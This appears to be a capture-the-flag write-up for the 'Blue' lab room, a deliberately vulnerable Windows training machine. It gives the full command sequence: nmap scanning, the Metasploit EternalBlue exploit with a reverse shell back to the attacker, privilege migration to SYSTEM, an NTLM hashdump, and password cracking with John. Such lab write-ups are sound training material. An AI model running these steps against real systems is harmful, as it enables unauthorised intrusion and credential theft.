Blue

Intro
Room Info
🔗 Name
🎯 Target IP
10.10.177.175
📈 Difficulty level
🟢Easy
💲 Subscription type
Free
🪟 OS
Windows
Recon
nmap -p1-1000 10.10.177.175
nmap -sV -p445 10.10.177.175
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175
Exploitation
msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run
background # or CTRL+Z

Privilege Escalation
Used payload was
windows/x64/shell/reverse_tcp
, so convert the shell to ameterpreter
shell.
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 2
run

sessions 5
getuid
Server username: NT AUTHORITY\SYSTEM
ps
My process may not run as
SYSTEM
user. Select aPID
(process ID) with theNT AUTHORITY\SYSTEM
user, and migrate my process to that one.e.g.
1284 - spoolsv.exe
migrate 1284

Post Exploitation
Cracking
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
aad3b435b51404eeaad3b435b51404ee
is the LM hash for no password.
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
ffb43f0de35be4d9917ac0cc8ad57f8d
is the NTLM hash for alqfna22
.
Jon's credentials are jon
:alqfna22
.

Flags
🚩 In the
meterpreter
session
cd C:\\
dir
cat flag1.txt
flag{*******************

cd C:/Windows/System32/config
cat flag2.txt
flag{*****************************

cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt
flag{********************************

Last updated
Was this helpful?